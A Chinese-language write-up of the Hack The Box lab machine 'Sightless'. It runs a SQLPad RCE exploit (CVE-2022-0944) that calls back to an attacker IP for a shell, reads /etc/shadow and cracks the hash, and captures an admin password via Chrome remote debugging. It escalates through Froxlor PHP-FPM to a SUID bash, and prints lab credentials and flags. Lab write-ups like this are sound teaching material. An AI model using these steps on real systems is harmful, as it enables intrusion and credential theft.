信息收集
| IP Address | Opening Ports |
|---|---|
| 10.10.11.32 | TCP:21,22,80 |
$ nmap -p- 10.10.11.32 --min-rate 1000 -sC -sV
PORT STATE SERVICE VERSION
21/tcp open ftp
| fingerprint-strings:
| GenericLines:
| 220 ProFTPD Server (sightless.htb FTP Server) [::ffff:10.10.11.32]
| Invalid command: try being more creative
|_ Invalid command: try being more creative
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 c9:6e:3b:8f:c6:03:29:05:e5:a0:ca:00:90:c9:5c:52 (ECDSA)
|_ 256 9b:de:3a:27:77:3b:1b:e1:19:5f:16:11:be:70:e0:56 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port21-TCP:V=7.94SVN%I=7%D=10/9%Time=67062BFA%P=x86_64-pc-linux-gnu%r(G
SF:enericLines,A0,"220\x20ProFTPD\x20Server\x20\(sightless\.htb\x20FTP\x20
SF:Server\)\x20\[::ffff:10\.10\.11\.32\]\r\n500\x20Invalid\x20command:\x20
SF:try\x20being\x20more\x20creative\r\n500\x20Invalid\x20command:\x20try\x
SF:20being\x20more\x20creative\r\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
SQLPad
# echo '10.10.11.32 sightless.htb'>>/etc/hosts
http://sightless.htb/
![[Meachines] [Easy] Sightless SQLPad-RCE+shadow哈希破译…插图](https://img.4awl.net/img/aa/646047a8c6c0edf96681d0c9beb621.jpg "[Meachines] [Easy] Sightless SQLPad-RCE+shadow哈希破译…插图")
![[Meachines] [Easy] Sightless SQLPad-RCE+shadow哈希破译…插图1](https://img.4awl.net/img/bc/49b51a6157fb1b0fa7ead92aac2a3b.jpg "[Meachines] [Easy] Sightless SQLPad-RCE+shadow哈希破译…插图1")
# echo '10.10.11.32 sqlpad.sightless.htb'>>/etc/hosts
http://sqlpad.sightless.htb/
![[Meachines] [Easy] Sightless SQLPad-RCE+shadow哈希破译…插图2](https://img.4awl.net/img/61/4d9b631305be60af1bc4f7dc080309.jpg "[Meachines] [Easy] Sightless SQLPad-RCE+shadow哈希破译…插图2")
https://github.com/shhrew/CVE-2022-0944
$ python3 main.py http://sqlpad.sightless.htb 10.10.16.10 10032
![[Meachines] [Easy] Sightless SQLPad-RCE+shadow哈希破译…插图3](https://img.4awl.net/img/ff/40746564191dd05c620855fef9ed12.jpg "[Meachines] [Easy] Sightless SQLPad-RCE+shadow哈希破译…插图3")
root(fack) -> michael
# cat /etc/shadow
![[Meachines] [Easy] Sightless SQLPad-RCE+shadow哈希破译…插图4](https://img.4awl.net/img/ef/97254c3e692aede043e13faf0e1770.jpg "[Meachines] [Easy] Sightless SQLPad-RCE+shadow哈希破译…插图4")
$6$mG3Cp2VPGY.FDE8u$KVWVIHzqTzhOSYkzJIpFc2EsgmqvPa.q2Z9bLUU6tlBWaEwuxCDEP9UFHIXNUcF2rBnsaFYuJa6DUh/pL2IJD/
$ hashcat -a 0 hash /usr/share/wordlists/rockyou.txt --force
![[Meachines] [Easy] Sightless SQLPad-RCE+shadow哈希破译…插图5](https://img.4awl.net/img/1e/351b243374d624b7a7042151bfb705.jpg "[Meachines] [Easy] Sightless SQLPad-RCE+shadow哈希破译…插图5")
)
insaneclownposse
$ ssh [email protected]
![[Meachines] [Easy] Sightless SQLPad-RCE+shadow哈希破译…插图6](https://img.4awl.net/img/8d/722391dd6c670789532d288eb0bf2c.jpg "[Meachines] [Easy] Sightless SQLPad-RCE+shadow哈希破译…插图6")
User.txt
75ce007325d8c9b8c70ab263b7b73da8
权限提升 - Chrome Remote Debugger && Forxlor-PHP_FPM
$ netstat -lnput
![[Meachines] [Easy] Sightless SQLPad-RCE+shadow哈希破译…插图7](https://img.4awl.net/img/f4/104f8a05b9522672ec9e0194e1b9ed.jpg "[Meachines] [Easy] Sightless SQLPad-RCE+shadow哈希破译…插图7")
$ ssh [email protected] \ -L 8080:127.0.0.1:8080 \ -L 3306:127.0.0.1:3306 \ -L 60469:127.0.0.1:60469 \ -L 38871:127.0.0.1:38871 \ -L 35295:127.0.0.1:35295 \ -L 3000:127.0.0.1:3000 \ -L 33060:127.0.0.1:33060
![[Meachines] [Easy] Sightless SQLPad-RCE+shadow哈希破译…插图8](https://img.4awl.net/img/90/d661ae061d9d9ad26fd926c27ab9fc.jpg "[Meachines] [Easy] Sightless SQLPad-RCE+shadow哈希破译…插图8")
通过linpeas枚举后,我们知道了是john用户启动了--remote-debugging-port模式
--remote-debugging-port 是一个命令行参数,它用于启动 Chrome 浏览器的远程调试模式。当 Chrome 浏览器以这种方式启动时,它会在指定的端口上监听调试器的连接,允许远程调试和控制浏览器会话。
![[Meachines] [Easy] Sightless SQLPad-RCE+shadow哈希破译…插图9](https://img.4awl.net/img/ef/fffaa5175c99ca4aeca8968a2adcb0.jpg "[Meachines] [Easy] Sightless SQLPad-RCE+shadow哈希破译…插图9")
wget https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb
$ google-chrom
chrome://inspect/#devices
![[Meachines] [Easy] Sightless SQLPad-RCE+shadow哈希破译…插图10](https://img.4awl.net/img/ab/689f8b69c69f340b8a9a8f346f90d0.jpg "[Meachines] [Easy] Sightless SQLPad-RCE+shadow哈希破译…插图10")
username:admin password:ForlorfroxAdmin
![[Meachines] [Easy] Sightless SQLPad-RCE+shadow哈希破译…插图11](https://img.4awl.net/img/ba/8eee6b75c9f16a109c5f23224dbd98.jpg "[Meachines] [Easy] Sightless SQLPad-RCE+shadow哈希破译…插图11")
![[Meachines] [Easy] Sightless SQLPad-RCE+shadow哈希破译…插图12](https://img.4awl.net/img/f5/296c01ed49444a8710649890b0e3ee.jpg "[Meachines] [Easy] Sightless SQLPad-RCE+shadow哈希破译…插图12")
点击查看,等待几秒即可通过Chrome 调试器截获到John输入的管理员密码
![[Meachines] [Easy] Sightless SQLPad-RCE+shadow哈希破译…插图13](https://img.4awl.net/img/9e/5837775a8c36b3ea44b2df93ad8a5e.jpg "[Meachines] [Easy] Sightless SQLPad-RCE+shadow哈希破译…插图13")
http://127.0.0.1:8080/admin_phpsettings.php?page=fpmdaemons&action=add
创建PHP-FPM版本,利用PHP-FPM执行命令
![[Meachines] [Easy] Sightless SQLPad-RCE+shadow哈希破译…插图14](https://img.4awl.net/img/2e/6e2bc92a0d2db7754c301ffe4e2b3b.jpg "[Meachines] [Easy] Sightless SQLPad-RCE+shadow哈希破译…插图14")
rev.sh:cp /bin/bash /tmp;chmod +s /tmp/bash
你可以把命令直接输入成:chmod 4755 /bin/bash
重启PHP-FPM
http://127.0.0.1:8080/admin_settings.php?page=overview&part=phpfpm
首先禁用,并且保存
![[Meachines] [Easy] Sightless SQLPad-RCE+shadow哈希破译…插图15](https://img.4awl.net/img/85/4d464710e034b2973e8860a0c8a8cf.jpg "[Meachines] [Easy] Sightless SQLPad-RCE+shadow哈希破译…插图15")
再次启动保存
![[Meachines] [Easy] Sightless SQLPad-RCE+shadow哈希破译…插图16](https://img.4awl.net/img/78/a44205f17c0acf777cbfdc3a119a1e.jpg "[Meachines] [Easy] Sightless SQLPad-RCE+shadow哈希破译…插图16")
michael@sightless:/tmp$ ./bash -p
![[Meachines] [Easy] Sightless SQLPad-RCE+shadow哈希破译…插图17](https://img.4awl.net/img/b2/80df44fc5eefd2c998ff45812fadc0.jpg "[Meachines] [Easy] Sightless SQLPad-RCE+shadow哈希破译…插图17")
Root.txt
9047f8db692036cd19e6bbfbc92708fb
4A评测 - 免责申明
本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。
不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。
本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。
如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!
程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。
侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)
